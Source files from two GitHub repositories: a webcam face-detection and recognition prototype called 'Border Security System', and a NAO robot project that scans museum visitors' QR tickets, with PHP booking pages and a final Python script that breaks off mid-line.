RishiNanthan/Border_Security_System | https://github.com/RishiNanthan/Border_Security_System | d6977fefcb374b2624df137cb7c5ebe930888102 | 05d6f4bb6510286ba4014beaed5d6da65f68d39d | d480355e545cfb035047a73d48c2cde0cbbe2620 | refs/heads/master | 2021-04-17T11:18:17.226714 | 2020-09-27T13:56:17 | 2020-09-27T13:56:17 | 249,441,095 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.423369437456131,
"alphanum_fraction": 0.442728728055954,
"avg_line_length": 29.90441131591797,
"blob_id": "7aa2d2c6a8ccc93a5bbcb838135749a69613525d",
"content_id": "82c30759283d1681cbf8f223185fa6f13bd16c0b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4339,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 136,
"path": "/VideoLocation.py",
"repo_name": "RishiNanthan/Border_Security_System",
"src_encoding": "UTF-8",
"text": "import cv2\r\nfrom mtcnn import MTCNN\r\nimport threading\r\nfrom Person import Person\r\nimport time\r\nimport PySimpleGUI as gui\r\nimport io\r\nfrom PIL import Image\r\n\r\n\r\nSIZE = 700\r\ngui.theme(\"DarkAmber\")\r\n\r\n\r\nclass Location:\r\n\r\n def __init__(self, src):\r\n self.vid = cv2.VideoCapture(src)\r\n self.img = None\r\n self.persons = []\r\n self.camera = 1\r\n if src == 0:\r\n self.camera = 0\r\n threading.Thread(target=self.read_images).start()\r\n self.detector = MTCNN()\r\n self.run()\r\n\r\n def read_images(self):\r\n _ = True\r\n while _:\r\n _, fr = self.vid.read()\r\n self.img = cv2.flip(fr, 1)\r\n\r\n def run(self):\r\n n = 0\r\n pre = time.time()\r\n _ = True\r\n while _:\r\n if self.camera:\r\n _, self.img = self.vid.read()\r\n\r\n n += 1\r\n if time.time() - pre >= 1:\r\n print(f\"{n} fps\")\r\n n = 0\r\n pre = time.time()\r\n\r\n faces, img = self.detect_faces()\r\n\r\n self.update_trackers(img)\r\n\r\n for face in faces:\r\n x, y, w, h = face[\"box\"]\r\n\r\n if face[\"confidence\"] < 0.8 or x <= 0 or y <= 0 or w <= 0 or h <= 0:\r\n continue\r\n\r\n x1, y1 = x + w, y + h\r\n found = False\r\n for person in self.persons:\r\n if person.is_same_face(x, y, x1, y1):\r\n person.set_face(x, y, x1, y1, img)\r\n found = True\r\n break\r\n if not found:\r\n person = Person(x, y, x1, y1, face, img)\r\n self.persons += [person]\r\n\r\n img = self.draw_persons(img)\r\n\r\n cv2.imshow('Border Security System', img)\r\n cv2.setMouseCallback('Border Security System', on_mouse=self.mouse_event_handler)\r\n if cv2.waitKey(1) & 0xFF == 27:\r\n break\r\n cv2.destroyAllWindows()\r\n self.vid.release()\r\n exit(1)\r\n\r\n def detect_faces(self):\r\n img = self.img\r\n return self.detector.detect_faces(img), img\r\n\r\n def draw_persons(self, img):\r\n for person in self.persons:\r\n img = cv2.rectangle(img, (person.face_x, person.face_y), (person.face_x1, person.face_y1), (0, 200, 0), 1)\r\n img = cv2.putText(img, person.name, (person.face_x, person.face_y), cv2.FONT_HERSHEY_SIMPLEX, 0.5,\r\n (0, 255, 0), 1)\r\n return img\r\n\r\n def update_trackers(self, img):\r\n persons = []\r\n for person in self.persons:\r\n if person.update_tracker(img):\r\n persons += [person]\r\n self.persons = persons\r\n\r\n def mouse_event_handler(self, type, x, y, flag, param):\r\n if type == cv2.EVENT_LBUTTONUP:\r\n for person in self.persons:\r\n if person.face_x < x < person.face_x1 and person.face_y < y < person.face_y1:\r\n\r\n name = \"\"\r\n\r\n if person.name != \"Recognising...\":\r\n face = cv2.imread(f'faces\\\\{person.name}.jpg')\r\n name = person.name\r\n else:\r\n face = person.get_face()\r\n face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)\r\n face = cv2.resize(face, (300, 300))\r\n image = Image.fromarray(face)\r\n bio = io.BytesIO()\r\n image.save(bio, format='PNG')\r\n face = bio.getvalue()\r\n\r\n layout = [\r\n [gui.T(\" \", size=(5, 1)), gui.Image(data=face)],\r\n [gui.Text(\"Name :\", size=(10, 1)), gui.InputText(name)],\r\n [gui.Text(\"ID :\", size=(10, 1)), gui.InputText()],\r\n [gui.Cancel(), gui.Ok()]\r\n ]\r\n\r\n win = gui.Window(\"Person\", no_titlebar=True, alpha_channel=0.98, resizable=True)\r\n win.Layout(layout)\r\n print(win.Read())\r\n win.Close()\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n loc = Location(0)\r\n # loc = Location(0)\r\n loc.run()\r\n except Exception as e:\r\n print(e)\r\n exit(0)\r\n"
},
{
"alpha_fraction": 0.5386971235275269,
"alphanum_fraction": 0.5618039965629578,
"avg_line_length": 28.184873580932617,
"blob_id": "1c418600cccf7e94789241eee0d10581e2cc4437",
"content_id": "fb130e2346d5a9f5218c33303dfac117329fda0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3592,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 119,
"path": "/Person.py",
"repo_name": "RishiNanthan/Border_Security_System",
"src_encoding": "UTF-8",
"text": "import cv2\r\nimport numpy as np\r\nimport threading\r\nimport os\r\nfrom keras_vggface.vggface import VGGFace\r\nfrom keras_vggface.utils import preprocess_input\r\nfrom scipy.spatial.distance import cosine\r\nimport random\r\n\r\n\r\nfaces = []\r\nfaces_dir = \"faces\"\r\nRecogniser = VGGFace(model=\"resnet50\", input_shape=(224, 224, 3), include_top=False, pooling=\"avg\")\r\n\r\n\r\nclass Person:\r\n ID = 1\r\n\r\n def __init__(self, x, y, x1, y1, properties, img):\r\n self.name = \"Recognising...\"\r\n self.name_id = f\"Person {Person.ID}\"\r\n Person.ID += 1\r\n self.face_x = x\r\n self.face_y = y\r\n self.face_x1 = x1\r\n self.face_y1 = y1\r\n self.tracker = cv2.TrackerKCF_create()\r\n self.tracker.init(img, (x, y, x1-x, y1-y))\r\n self.properties = properties\r\n self.img = img\r\n # threading.Thread(target=self.recognise_face).start()\r\n self.recognise_face()\r\n\r\n def set_face(self, x, y, x1, y1, img):\r\n self.img = img\r\n self.face_x, self.face_y, self.face_x1, self.face_y1 = x, y, x1, y1\r\n self.tracker.init(img, (x, y, x1-x, y1-y))\r\n # threading.Thread(target=self.recognise_face).start()\r\n self.recognise_face()\r\n\r\n def get_face(self):\r\n return self.img[self.face_y: self.face_y1, self.face_x: self.face_x1]\r\n\r\n def is_same_face(self, x, y, x1, y1):\r\n mx = (x + x1) // 2\r\n my = (y + y1) // 2\r\n if self.face_x < mx < self.face_x1 and self.face_y < my < self.face_y1:\r\n return True\r\n return False\r\n\r\n def recognise_face(self):\r\n global faces\r\n face = self.img[self.face_y: self.face_y1, self.face_x: self.face_x1]\r\n\r\n face = np.asarray(face, 'float32')\r\n face = preprocess_input(face)\r\n face = cv2.resize(face, (224, 224))\r\n cv2.imwrite(f'check\\\\img{random.randrange(1, 1000)}.jpg', face)\r\n encodings = Recogniser.predict([[face]])\r\n encoding = encodings[0]\r\n\r\n for i in faces:\r\n comparison = compare_faces(i.face_encoding, encoding)\r\n if comparison > 0.5:\r\n self.name = i.name\r\n break\r\n\r\n def update_tracker(self, img):\r\n self.img = img\r\n _, bb = self.tracker.update(img)\r\n x, y, w, h = (int(i) for i in bb)\r\n x1 = x + w\r\n y1 = y + h\r\n if x == y == x1 == y1 == 0:\r\n return False\r\n self.face_x, self.face_y, self.face_x1, self.face_y1 = x, y, x1, y1\r\n return _\r\n\r\n\r\nclass Face:\r\n\r\n def __init__(self, encoding, name):\r\n self.face_encoding = encoding\r\n self.name = name\r\n\r\n def __repr__(self):\r\n return self.name\r\n\r\n\r\ndef get_known_face_encodings(folder_path):\r\n global faces\r\n face_files = os.listdir(folder_path)\r\n for file in face_files:\r\n face = cv2.imread(f\"{folder_path}\\\\{file}\")\r\n\r\n face = cv2.resize(face, (224, 224))\r\n face = np.asarray(face, 'float32')\r\n face = preprocess_input(face)\r\n encodings = Recogniser.predict([[face]])\r\n faces += [Face(encodings[0], file[:-4])]\r\n\r\n print(f\"No of Faces in database : {len(faces)}\")\r\n print(\"People :\", *faces)\r\n\r\n\r\ndef compare_faces(known_encoding, unknown_encoding):\r\n \"\"\"\r\n :param known_encoding: encoding found using neural net\r\n :param unknown_encoding: encoding found using neural net\r\n :return: score of match 1 - complete match; 0 - no match;\r\n \"\"\"\r\n score = cosine(known_encoding, unknown_encoding)\r\n return 1 - score\r\n\r\n\r\nget_known_face_encodings(faces_dir)\r\n\r\nif __name__ == '__main__':\r\n pass\r\n"
},
{
"alpha_fraction": 0.8303571343421936,
"alphanum_fraction": 0.8303571343421936,
"avg_line_length": 55,
"blob_id": "fdf406b19e4b88c717366f71b613ee0d29ae2d78",
"content_id": "647d4ed2b8a5afc16fb1ab6d2475b93e59f5b4e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 2,
"path": "/README.md",
"repo_name": "RishiNanthan/Border_Security_System",
"src_encoding": "UTF-8",
"text": "# Border_Security_System\nTo create a security system that uses face recognition system for identifying persons.\n"
}
] | 3 |
mahlaNasr/nao_robot_project | https://github.com/mahlaNasr/nao_robot_project | b7a90db584fcf7ac70aa955ee4dbcc4cd33a84aa | 6c00d5b4c9f92cd0f18d7404cdbab7d78b0fc854 | a33a4fceda2d596b319b8351e2f74e00e549a53c | refs/heads/master | 2023-04-14T04:51:58.027664 | 2021-04-14T22:07:43 | 2021-04-14T22:07:43 | 353,782,749 | 0 | 0 | null | 2021-04-01T17:53:16 | 2021-04-05T17:18:59 | 2021-04-05T17:19:46 | Python | [
{
"alpha_fraction": 0.48387566208839417,
"alphanum_fraction": 0.49549680948257446,
"avg_line_length": 39.25730895996094,
"blob_id": "de5efb8c4c0c5405b90908e3a7a4f0204932ad1b",
"content_id": "edef19de2efffcdb92364a6ad14cf05d47e1544f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6884,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 171,
"path": "/scripts_frf/nao_french_project.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 06/04/2021\n# File Name: nao_project.py\n#\n# This program with the help of other classes, asks visitors to scan their\n# QR code. Based on whether their barcode is valid or not, the robot\n# extracts its information and gives out personalised responses.\n############################################################################\n\n\n#--------------------------------------------------------------------------\n# Importing necessary packages and files\n#--------------------------------------------------------------------------\nimport nao_scan_lang as scan\nfrom Tkinter import *\nimport Tkinter as tk\nimport cv2 as cv\nimport argparse\nimport random\nimport time\nimport json\nimport os\nimport qi\n\n\n\n\nclass NaoProject():\n def __init__(self):\n # Text To Speech (tts) service\n self.tts = session.service('ALTextToSpeech')\n # Calling and creating objects for external classes\n self.scan_code = scan.NaoScanBarcode()\n\n # Getting the service ALDialog\n self.ALDialog = session.service(\"ALDialog\")\n self.ALDialog.setLanguage(\"French\")\n\n #---------------------------------------------------------------------------\n # This is the main function of this class where the robot interacts with\n # the visitors and asks them to scan their QR code. It also checks the\n # parameters that are inside the QR code and gives out specific feedback\n # regardng the inputs.\n # Argument: None\n #---------------------------------------------------------------------------\n def nao_dialog(self):\n scanning = True\n while scanning:\n # Get visitor's name\n return_name = self.scan_code.json_data(\"Name\")\n # Greet users to start the system\n hello = [\"hi\", \"hello\", \"hey\", \"greetings\"]\n self.tts.say(random.choice(hello) + \" \" + return_name)\n\n # Get specific values from the json file\n return_language = self.scan_code.json_data(\"Language\")\n\n # Check if NAO can speak the language that is picked\n if return_language == \"French\":\n self.tts.say(\"You can speak \" + return_language + \". Very cool!!\")\n else:\n self.tts.say(\"I havn't learnt that language yet. Sorry... 
)\")\n\n # >>> Load the french talk dialogs\n try:\n french_content = self.ALDialog.loadTopic(os.path.abspath(\"french_talk_frf.top\"))\n except:\n french_content = \"french_talk\"\n print \"[INFO] French loaded topics:\", self.ALDialog.getLoadedTopics(\"French\")\n\n # Activating the loaded topic\n self.ALDialog.activateTopic(french_content)\n self.ALDialog.subscribe('visitor_language')\n\n try:\n self.ALDialog.forceOutput()\n # Enable the GUI button to move on to next visitor\n self.next_visitor()\n print \"[INFO] Waiting for next visitor...\"\n finally:\n # stopping the dialog engine\n self.ALDialog.unsubscribe('visitor_language')\n # Deactivating topic\n self.ALDialog.deactivateTopic(french_content)\n self.ALDialog.unloadTopic(french_content)\n\n\n # Keep Running the Loop\n scanning = True\n\n\n #---------------------------------------------------------------------------\n # GUI Button to start conversation with the next visitor\n # Agument: None\n #---------------------------------------------------------------------------\n def next_visitor(self):\n def next():\n self.window.destroy()\n self.gui()\n\n self.window.title(\"Speak Again\")\n label = tk.Label(self.window,fg=\"white\", bg='#4a536b',\n text=\"Press Start To Talk To NAO\",\n font = ('calibri', 12, 'bold'),\n borderwidth = '3')\n # start button\n next_person = tk.Button(self.window, text =\"Start\",\n command = next, bg='#cbf6db',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n # To be able to exit the whole system,\n quit_btn = tk.Button(self.window, text =\"Quit\",\n command = quit, bg='#CD5C5C',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n\n # Load 10 seconds after conversation with NAO is done.\n wait_time = 5000\n self.window.after(wait_time,\n label.grid(row=0, column=5, padx=40, pady=50))\n self.window.after(wait_time,\n next_person.grid(row=1, column=5, padx=40, pady=10))\n self.window.after(wait_time,\n quit_btn.grid(row=2, column=5, padx=40, pady=10))\n mainloop()\n\n\n\n #---------------------------------------------------------------------------\n # Initialising Graphical User Interface(GUI) for scanning qr code and moving\n # on to next customer using Tkinter\n # Argument: None\n #---------------------------------------------------------------------------\n def gui(self):\n # For GUI input buttons create a window\n self.window = Tk()\n self.window.geometry(\"300x400\")\n self.window.configure(background='#4a536b')\n\n#---------------------------------------------------------------------------\n# Main function to start module sessions\n# Agument: Session\n#---------------------------------------------------------------------------\ndef main(session):\n # Creating an object of NaoProject class\n main_obj = NaoProject()\n # Calling main function of the class\n main_obj.nao_dialog()\n\nif __name__ == \"__main__\":\n # Connecting to the Choregraphe simulated robot (from Robotic Platform)\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", type=str, default=\"desktop-6d4cqe5.local\",\n help=\"Robot's IP address. 
If on a robot or a local Naoqi - use '127.0.0.1' (this is the default value).\")\n parser.add_argument(\"--port\", type=int, default=9559,\n help=\"port number, the default value is OK in most cases\")\n args = parser.parse_args()\n session = qi.Session()\n try:\n session.connect(\"tcp://{}:{}\".format(args.ip, args.port))\n except RuntimeError:\n print (\"\\nCan't connect to Naoqi at IP {} (port {}).\\nPlease check your script's arguments.\"\n \" Run with -h option for help.\\n\".format(args.ip, args.port))\n sys.exit(1)\n main(session)\n"
},
{
"alpha_fraction": 0.47695034742355347,
"alphanum_fraction": 0.4867021143436432,
"avg_line_length": 30.33333396911621,
"blob_id": "ef00f7765fa44ed0a60149cf2c7cd2eeb2d48e6a",
"content_id": "aaa3523db6df36603b86d9f7ecfd6cd3d140f0c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1128,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 36,
"path": "/booking_website/extras/confirmation.php",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<!-- ##########################################################################\nAuthor: Mahla Nasrollahi\nLast Updated: 11/03/2021\nFile Name: confirmation.php\n\nThis php file shows a message that a user has successfully booked when they\nclick on the \"Book Now\" button.\n############################################################################-->\n\n<html lang=\"en\" dir=\"ltr\">\n <head>\n <meta charset=\"UTF-8\">\n <title>Booking a Ticket</title>\n <!-- Import all the external links and the scripts -->\n <?php include('header.php'); ?>\n </head>\n\n <body>\n <!-- Import the navigation bar and other body parts -->\n <?php include('body_nav.php'); ?>\n\n <div class=\"main top-bar-sm tnew-content\">\n <div class=\"container\">\n <div class=\"feedback_page\">\n <?php echo \"<h1>Thank you for booking.</h1>\n <br>\n <p>Your ticket with information will be emailed to you shortly.</p>\"; ?>\n </div>\n </div>\n </div>\n\n <!-- Import footer section of the website -->\n <?php include('footer.php'); ?>\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.4193061888217926,
"alphanum_fraction": 0.42361560463905334,
"avg_line_length": 39.00862121582031,
"blob_id": "617dcf5d79460f1ea584581702710d2589559837",
"content_id": "b97347e3b7ba05b77ed95dc38cd2d04382d77dcd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4643,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 116,
"path": "/booking_website/index.php",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<!-- To access the page: http://192.168.64.2/eep/index.php -->\n\n<html lang=\"en\" dir=\"ltr\">\n <head>\n <meta charset=\"UTF-8\">\n <title>Booking a Ticket</title>\n <!-- Import all the external links and the scripts -->\n <?php include('extras/header.php'); ?>\n </head>\n\n <body>\n\n <!-- Import the navigation bar and other body parts -->\n <?php include('extras/body_nav.php'); ?>\n\n\n <div class=\"main top-bar-sm tnew-content\">\n <div class=\"container\">\n\n <!-- END INJECTED HEADER -->\n <nav class=\"tn-subnav-component\">\n <div style=\"clear: both;\"></div>\n </nav>\n\n <main class=\"tn-events-detail-page\" >\n <div>\n <div class=\"tn-event-detail__main-container\">\n <div>\n <h2>Conversations with God</h2>\n <h1><b>Jan Matejko’s Copernicus</b></h1><br/>\n </div>\n\n <!-- FORM -->\n <form action=\"extras/confirmation.php\" class=\"form-horizontal tn-ticket-selector form-signin\" method=\"POST\" id=\"form\">\n \t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t<!-- NAME -->\n \t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t<ul class=\"list-unstyled form-group\">\n \t\t\t\t\t\t\t\t\t\t\t\t<label class=\"control-label\">Name</label>\n \t\t\t\t\t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t<input class=\"form-control width\" id=\"name\" name=\"name\" type=\"text\" placeholder=\"Name\" required=\"required\">\n \t\t\t\t\t\t\t\t\t\t\t\t</div>\n \t\t\t\t\t\t\t\t\t\t</ul><br/>\n \t\t\t\t\t\t\t\t</div>\n\n \t\t\t\t\t\t\t\t<!-- Email -->\n \t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t<ul class=\"list-unstyled form-group\">\n \t\t\t\t\t\t\t\t\t\t\t\t<label class=\"control-label\">Email</label>\n \t\t\t\t\t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t<input class=\"form-control width\" id=\"email\" name=\"email\" type=\"email\" placeholder=\"Email address\" required=\"required\">\n \t\t\t\t\t\t\t\t\t\t\t\t</div>\n \t\t\t\t\t\t\t\t\t\t</ul><br/>\n \t\t\t\t\t\t\t\t</div>\n\n\n \t\t\t\t\t\t\t\t<!-- Membership Type -->\n \t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t<ul class=\"list-unstyled form-group\">\n \t\t\t\t\t\t\t\t\t\t\t\t<li class=\"ng-spacer\"></li>\n \t\t\t\t\t\t\t\t\t\t\t\t<label class=\"control-label\">Ticket Type</label>\n \t\t\t\t\t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t\t\t\t<select class=\"form-control css-sel\" id=\"ticket_type\" name=\"ticket_type\" required=\"required\">\n <option value=\"\">Choose a ticket type</option>\n <option value=\"Member\">Member</option>\n <option value=\"Standard + Variety of Donation Options\">Standard + Variety of Donation Options</option>\n <option value=\"Standard + Free\">Standard + Free</option>\n <option value=\"Standard + Under 13 for free\">Standard + Under 13 for free</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t</select>\n \t\t\t\t\t\t\t\t\t\t\t\t</div>\n \t\t\t\t\t\t\t\t\t\t</ul><br/>\n \t\t\t\t\t\t\t\t</div>\n\n\n \t\t\t\t\t\t\t\t<!-- Interests -->\n \t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t<ul class=\"list-unstyled form-group\">\n \t\t\t\t\t\t\t\t\t\t\t\t<li class=\"ng-spacer\"></li><li class=\"tn-ticket-selector__pricetype-list-item\">\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t<label class=\"control-label\">Choose an Interest</label>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t<div>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<select class=\"form-control css-sel\" id=\"interests\" name=\"interests\" required=\"required\">\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<option value=\"\">Choose an option</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<option value=\"Artist\">About the the Artist</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<option 
value=\"History\">History of the Artist/Art</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<option value=\"Culture\">About the Culture</option>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t</select>\n \t\t\t\t\t\t\t\t\t\t\t\t\t\t</div>\n </li>\n \t\t\t\t\t\t\t\t\t\t</ul><br/>\n \t\t\t\t\t\t\t\t</div>\n\n \t\t\t\t\t\t</div>\n\n \t\t\t\t\t\t<div class=\"row button-row\">\n \t\t\t\t\t\t\t\t<div class=\"col-12 text-right\">\n \t\t\t\t\t\t\t\t\t\t<input name=\"submit\" id=\"submit\" class=\"btn btn-next btn-primary btn-primary-blue\" type=\"submit\" value=\"Book Now\" />\n \t\t\t\t\t\t\t\t</div>\n \t\t\t\t\t\t</div>\n \t\t\t\t</form>\n </div>\n </div>\n </main>\n </div>\n\n\n <!-- jQuery for getting data for QR code -->\n <script src=\"input_variables.js\"></script>\n\n\n\n <?php include('extras/footer.php'); ?>\n\n\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.4765421450138092,
"alphanum_fraction": 0.488010436296463,
"avg_line_length": 42.59848403930664,
"blob_id": "719852660aff514e304a0f4a749a3d24eba615d1",
"content_id": "ee4156840a390c02425f1800de9458c1a819f317",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11510,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 264,
"path": "/scripts_enu/nao_project.py",
"repo_name": "mahlaNasr/nao_robot_project",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n##########################################################################\n# Author: Mahla Nasrollahi\n# Last Updated: 06/04/2021\n# File Name: nao_project.py\n#\n# This program with the help of other classes, asks visitors to scan their\n# QR code. Based on whether their barcode is valid or not, the robot\n# extracts its information and gives out personalised responses.\n############################################################################\n\n\n#--------------------------------------------------------------------------\n# Importing necessary packages and files\n#--------------------------------------------------------------------------\nimport nao_talk as talk\nimport nao_scan as scan\nfrom Tkinter import *\nimport Tkinter as tk\nimport cv2 as cv\nimport argparse\nimport random\nimport time\nimport json\nimport os\nimport qi\n\n\n\n\nclass NaoProject():\n def __init__(self):\n # Text To Speech (tts) service\n self.tts = session.service('ALTextToSpeech')\n # Calling and creating objects for external classes\n self.scan_code = scan.NaoScanBarcode()\n self.dialogs = talk.NaoDialogs()\n\n # Getting the service ALDialog\n self.ALDialog = session.service(\"ALDialog\")\n self.ALDialog.setLanguage(\"English\")\n\n #---------------------------------------------------------------------------\n # This is the main function of this class where the robot interacts with\n # the visitors and asks them to scan their QR code. It also checks the\n # parameters that are inside the QR code and gives out specific feedback\n # regardng the inputs.\n # Argument: None\n #---------------------------------------------------------------------------\n def nao_dialog(self):\n scanning = True\n while scanning:\n # Greet users to start the system\n hello = [\"hi\", \"hello\", \"hey\", \"greetings\"]\n self.tts.say(random.choice(hello))\n\n # >>> Load ticket scan dialogue\n try:\n qrcode_content = self.ALDialog.loadTopic(os.path.abspath(\"ticket_scan_enu.top\"))\n except:\n qrcode_content = \"ticket_scan\"\n print \"[INFO] English loaded topics:\", self.ALDialog.getLoadedTopics(\"English\")\n # Activating the loaded topic\n self.ALDialog.activateTopic(qrcode_content)\n self.ALDialog.subscribe('nao_conversation')\n\n try:\n # Enable GUI button for users to press for scanning\n def yes():\n self.ALDialog.forceInput(\"have_ticket\")\n self.window.destroy()\n # User has no ticket\n def no():\n self.ALDialog.forceInput(\"no_ticket\")\n self.gui()\n self.window.title(\"Ticket Check\")\n # Label of the box\n label = tk.Label(self.window, fg=\"white\", bg='#4a536b',\n text = \"Do you have a ticket?\",\n font = ('calibri', 12, 'bold'),\n borderwidth = '3')\n # Yes Button\n yes_btn = tk.Button(self.window,\n text =\"Yes - Ready for Scanning QR Code\",\n command = yes, bg='#9bc472',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n # No button\n no_btn = Button(self.window, text = \"No\",\n \t\t command = no, bg='#ff9a8d',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n\n # Load 4 seconds amount after conversation with NAO is done.\n wait_time = 4000\n self.window.after(wait_time,\n label.grid(row=0, column=5, padx=40, pady=50))\n self.window.after(wait_time,\n yes_btn.grid(row=1, column=5, padx=40, pady=10))\n self.window.after(wait_time,\n no_btn.grid(row=2, column=5, padx=40, pady=10))\n mainloop()\n\n finally:\n # stopping the dialog engine\n self.ALDialog.unsubscribe('nao_conversation')\n # Deactivating 
topic\n self.ALDialog.deactivateTopic(qrcode_content)\n self.ALDialog.unloadTopic(qrcode_content)\n\n try_again = [\"Sorry I couldn't read that. Can I see your ticket again?\",\n \"Let me scan again, try to keep your hand steady.\",\n \"Please scan again, try to come closer to the camera.\",\n \"That was blurry, please try again.\",\n \"Please make sure that your brightness is about 50% then try again.\"]\n\n scan_again = True\n while(scan_again):\n # Check if barcode is clear and can be decoded\n self.scan_code.scan_qrcode()\n\n # Check if barcode is readable and clear\n if self.scan_code.check_readable() is True:\n print \"[INFO] Done scanning.\"\n self.tts.say(\"Thank you. Your barcode has been successfully scanned.\")\n cv.destroyAllWindows()\n #Get specific values from the json file\n return_interest = self.scan_code.json_data(\"Interest\")\n\n # Getting random conversation strings from NaoDialogs class\n interest_option = self.dialogs.intro_interest()\n speech = self.dialogs.interest_talk(return_interest)\n\n # Check if the QR code is a valid one\n if return_interest == \"Artist\" or return_interest == \"History\" or return_interest == \"Culture\":\n self.tts.say(interest_option + str(return_interest) + \". \" + speech)\n scan_again = False\n else:\n self.tts.say(\"Your barcode is invalid. Please try again.\")\n scan_again = True\n else:\n self.tts.say(random.choice(try_again))\n # Close scanning window\n cv.destroyAllWindows()\n cv.waitKey(1)\n\n # Checking if a visitor has membership or not\n return_tickType = self.scan_code.json_data(\"ticket_type\")\n\n # >>> Load the welcome talk dialogs\n self.tts.say(\"Anyway, now you know something about what you were interested in!\")\n try:\n welcome_content = self.ALDialog.loadTopic(os.path.abspath(\"welcome_talk_enu.top\"))\n except:\n welcome_content = \"welcome_talk\"\n print \"[INFO] English loaded topics:\", self.ALDialog.getLoadedTopics(\"English\")\n\n # Activating the loaded topic\n self.ALDialog.activateTopic(welcome_content)\n self.ALDialog.subscribe('welcome_visitor')\n\n if return_tickType != \"Member\":\n self.ALDialog.forceInput(\"no_membership\")\n else:\n self.ALDialog.forceInput(\"yes_membership\")\n\n try:\n # Delete the JSON file and its information from system when\n # finished talking to a visitor\n self.scan_code.remove_json()\n # Enable the GUI button to move on to next visitor\n self.next_visitor()\n print \"[INFO] Waiting for next visitor...\"\n finally:\n # stopping the dialog engine\n self.ALDialog.unsubscribe('welcome_visitor')\n # Deactivating topic\n self.ALDialog.deactivateTopic(welcome_content)\n self.ALDialog.unloadTopic(welcome_content)\n\n # Keep Running the Loop\n scanning = True\n\n\n #---------------------------------------------------------------------------\n # GUI Button to start conversation with the next visitor\n # Argument: None\n #---------------------------------------------------------------------------\n def next_visitor(self):\n def next():\n self.window.destroy()\n self.gui()\n\n self.window.title(\"Next Visitor\")\n label = tk.Label(self.window,fg=\"white\", bg='#4a536b',\n text=\"Press Start To Talk To NAO\",\n font = ('calibri', 12, 'bold'),\n borderwidth = '3')\n # start button\n next_person = tk.Button(self.window, text =\"Start\",\n command = next, bg='#cbf6db',\n height=2, width=30,\n font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n # To be able to exit the whole system,\n quit_btn = tk.Button(self.window, text =\"Quit\",\n command = quit, bg='#CD5C5C',\n height=2, width=30,\n 
font = ('calibri', 10, 'bold'),\n borderwidth = '3')\n\n # Show the widgets 10 seconds after the conversation with NAO is done.\n # Each grid() call is wrapped in a lambda so it runs after the delay\n # instead of being executed immediately.\n wait_time = 10000\n self.window.after(wait_time,\n lambda: label.grid(row=0, column=5, padx=40, pady=50))\n self.window.after(wait_time,\n lambda: next_person.grid(row=1, column=5, padx=40, pady=10))\n self.window.after(wait_time,\n lambda: quit_btn.grid(row=2, column=5, padx=40, pady=10))\n mainloop()\n\n\n\n #---------------------------------------------------------------------------\n # Initialising Graphical User Interface (GUI) for scanning qr code and moving\n # on to next customer using Tkinter\n # Argument: None\n #---------------------------------------------------------------------------\n def gui(self):\n # For GUI input buttons create a window\n self.window = Tk()\n self.window.geometry(\"300x400\")\n self.window.configure(background='#4a536b')\n\n#---------------------------------------------------------------------------\n# Main function to start module sessions\n# Argument: Session\n#---------------------------------------------------------------------------\ndef main(session):\n # Creating an object of NaoProject class\n main_obj = 